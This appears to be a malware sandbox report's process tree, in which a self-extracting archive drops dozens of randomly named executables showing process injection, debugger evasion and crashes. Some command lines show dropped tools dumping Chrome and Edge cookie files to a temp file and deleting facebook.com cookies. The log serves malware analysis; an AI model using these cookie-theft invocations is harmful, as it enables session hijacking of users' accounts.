C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:13⤵PID:5156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:13⤵PID:5172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2592 /prefetch:23⤵PID:6536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:13⤵PID:8128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:13⤵PID:7268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:13⤵PID:6396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:13⤵PID:1444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:13⤵PID:6300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:13⤵PID:8524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:13⤵PID:5700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:13⤵PID:5124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:13⤵PID:6768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:13⤵PID:8844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:13⤵PID:5680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2072 /prefetch:13⤵PID:5628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1892 /prefetch:13⤵PID:7856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:13⤵PID:7236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17455370505533310580,10918663795548022076,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1280 /prefetch:13⤵PID:6188
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a3⤵
- Executes dropped EXE
PID:5052
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"2⤵
- Executes dropped EXE
PID:5112 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3104
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4332 -
C:\Users\Admin\Documents\lisoce45yJdfxtoDinkLPBB0.exe"C:\Users\Admin\Documents\lisoce45yJdfxtoDinkLPBB0.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6000 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6000 -s 2924⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5824
-
-
-
C:\Users\Admin\Documents\7UkvtrUTSmAK3klJFTndgCre.exe"C:\Users\Admin\Documents\7UkvtrUTSmAK3klJFTndgCre.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5984 -
C:\Users\Admin\Documents\7UkvtrUTSmAK3klJFTndgCre.exe"C:\Users\Admin\Documents\7UkvtrUTSmAK3klJFTndgCre.exe"4⤵PID:6180
-
-
-
C:\Users\Admin\Documents\4L2GsvQzMO7vo0QaK9U3olVx.exe"C:\Users\Admin\Documents\4L2GsvQzMO7vo0QaK9U3olVx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5972
-
-
C:\Users\Admin\Documents\KjIibsr653LiAdo4AbwEUa5p.exe"C:\Users\Admin\Documents\KjIibsr653LiAdo4AbwEUa5p.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5964 -
C:\Users\Admin\Documents\KjIibsr653LiAdo4AbwEUa5p.exe"C:\Users\Admin\Documents\KjIibsr653LiAdo4AbwEUa5p.exe"4⤵PID:7016
-
-
-
C:\Users\Admin\Documents\fyeOs5QJVz_AdrttNf_bhMfo.exe"C:\Users\Admin\Documents\fyeOs5QJVz_AdrttNf_bhMfo.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5956 -
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4120 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3988
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5544
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:5336
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5592
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Suspicious use of SetWindowsHookEx
PID:6500
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Suspicious use of SetWindowsHookEx
PID:6640
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Suspicious use of SetWindowsHookEx
PID:7384
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Suspicious use of SetWindowsHookEx
PID:7700
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5552
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"4⤵
- Executes dropped EXE
PID:6080 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4348
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4148
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:2084
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7928
-
-
-
-
C:\Users\Admin\Documents\IvikQulGbRWAwMsnu_ycAl0V.exe"C:\Users\Admin\Documents\IvikQulGbRWAwMsnu_ycAl0V.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5948 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 3004⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4464
-
-
-
C:\Users\Admin\Documents\YVBi_Q2DKepj565af4SD32ux.exe"C:\Users\Admin\Documents\YVBi_Q2DKepj565af4SD32ux.exe"3⤵
- Executes dropped EXE
PID:5940 -
C:\Users\Admin\Documents\YVBi_Q2DKepj565af4SD32ux.exe"C:\Users\Admin\Documents\YVBi_Q2DKepj565af4SD32ux.exe"4⤵PID:7416
-
C:\Users\Admin\AppData\Local\Temp\zzx.exe"C:\Users\Admin\AppData\Local\Temp\zzx.exe"5⤵
- Drops startup file
PID:4120 -
C:\Users\Admin\AppData\Local\Temp\zzx.exeC:\Users\Admin\AppData\Local\Temp\zzx.exe6⤵
- Suspicious use of SetWindowsHookEx
PID:6756
-
-
C:\Users\Admin\AppData\Local\Temp\zzx.exeC:\Users\Admin\AppData\Local\Temp\zzx.exe6⤵PID:3188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 367⤵
- Program crash
PID:4860
-
-
-
-
-
-
C:\Users\Admin\Documents\4VN6wp3p249Peftj5bgWx74K.exe"C:\Users\Admin\Documents\4VN6wp3p249Peftj5bgWx74K.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5928 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 3124⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4012
-
-
-
C:\Users\Admin\Documents\Sxg9ZZxbMH8kA5rom8mY1FbX.exe"C:\Users\Admin\Documents\Sxg9ZZxbMH8kA5rom8mY1FbX.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5916
-
-
C:\Users\Admin\Documents\oZ7g_D9oITjP6QBP7YE7EdXv.exe"C:\Users\Admin\Documents\oZ7g_D9oITjP6QBP7YE7EdXv.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6036 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"4⤵
- Suspicious use of SetThreadContext
PID:8020 -
C:\Users\Admin\AppData\Local\Temp\build.exeC:\Users\Admin\AppData\Local\Temp\build.exe5⤵PID:7348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 286⤵
- Program crash
PID:7428
-
-
-
-
-
C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:2344 -
C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"4⤵
- Executes dropped EXE
PID:2908 -
C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"5⤵PID:7064
-
C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"C:\Users\Admin\Documents\6fCfeRmxTQ7EY00t_cotuQ81.exe"6⤵PID:3724
-
-
-
-
-
C:\Users\Admin\Documents\wuxK2JwKEIjFJEie_od4yOxD.exe"C:\Users\Admin\Documents\wuxK2JwKEIjFJEie_od4yOxD.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3168
-
-
C:\Users\Admin\Documents\1nrJiz9SHjwr79c1yUpRUJCm.exe"C:\Users\Admin\Documents\1nrJiz9SHjwr79c1yUpRUJCm.exe"3⤵
- Executes dropped EXE
PID:4612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2732
-
-
-
C:\Users\Admin\Documents\iN1vEaA5nIXun0Ch70YplDck.exe"C:\Users\Admin\Documents\iN1vEaA5nIXun0Ch70YplDck.exe"3⤵
- Executes dropped EXE
PID:3224
-
-
C:\Users\Admin\Documents\4vd7wzaSJ6O6_peChFvraIg4.exe"C:\Users\Admin\Documents\4vd7wzaSJ6O6_peChFvraIg4.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
C:\Users\Admin\Documents\Msbq7N806vY_kgIRiAQxy9Gp.exe"C:\Users\Admin\Documents\Msbq7N806vY_kgIRiAQxy9Gp.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4584
-
-
C:\Users\Admin\Documents\g2lVQYLYuJPgPh38AhEEXnAB.exe"C:\Users\Admin\Documents\g2lVQYLYuJPgPh38AhEEXnAB.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
C:\Users\Admin\Documents\BsSk35ZHvQtQ6ycRA83qwiKw.exe"C:\Users\Admin\Documents\BsSk35ZHvQtQ6ycRA83qwiKw.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Users\Admin\Documents\2YaXYEQpN4D2gejue_SlPHNO.exe"C:\Users\Admin\Documents\2YaXYEQpN4D2gejue_SlPHNO.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5648
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4868
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SetWindowsHookEx
PID:3712
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:8560
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6824
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6472
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:9136
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6484
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3416
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7476
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6592
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5476
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5484
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6472
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2092
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:8196
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7384
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4356
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5620
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5020
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2552
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2928
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4080
-
-
-
C:\Users\Admin\Documents\mdff13DR1phi2sNDJO2fNU5a.exe"C:\Users\Admin\Documents\mdff13DR1phi2sNDJO2fNU5a.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1820 -
C:\Users\Admin\Documents\mdff13DR1phi2sNDJO2fNU5a.exeC:\Users\Admin\Documents\mdff13DR1phi2sNDJO2fNU5a.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
-
C:\Users\Admin\Documents\ULQYaddSV6Nl0fN2ZjJ2vuRQ.exe"C:\Users\Admin\Documents\ULQYaddSV6Nl0fN2ZjJ2vuRQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1744 -
C:\Users\Admin\Documents\ULQYaddSV6Nl0fN2ZjJ2vuRQ.exeC:\Users\Admin\Documents\ULQYaddSV6Nl0fN2ZjJ2vuRQ.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
-
C:\Users\Admin\Documents\FKk6yd4IL4syFy2gnZDVAaMN.exe"C:\Users\Admin\Documents\FKk6yd4IL4syFy2gnZDVAaMN.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1712 -
